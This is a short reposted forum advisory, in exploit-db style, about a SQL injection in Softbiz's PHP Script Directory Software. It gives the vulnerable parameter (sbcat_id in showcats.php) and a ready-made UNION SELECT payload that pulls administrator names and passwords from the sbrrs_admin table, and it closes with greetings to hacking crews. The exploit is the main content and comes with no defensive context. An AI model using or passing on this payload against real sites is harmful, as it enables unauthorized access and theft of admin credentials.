-
-
[转帖]PHP Script Directory Software (sbcat_id) SQL Injection Vulnerability
-
发表于:
2011-1-29 07:50
2624
-
[转帖]PHP Script Directory Software (sbcat_id) SQL Injection Vulnerability
Script: PHP script directory software
Version: n/a
Link: http://www.softbizsolutions.com/script-directory-software.php
==
3xploit:
[path]/showcats.php?sbcat_id=[SQL-Injection]
3xample:
[path]/showcats.php?sbcat_id=-9999+union+all+select+1,concat(sbadmin_name,0x3a,sbadmin_pwd),3,4,5+from+sbrrs_admin--
==
Greetings:
darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"
[课程]Linux pwn 探索篇!
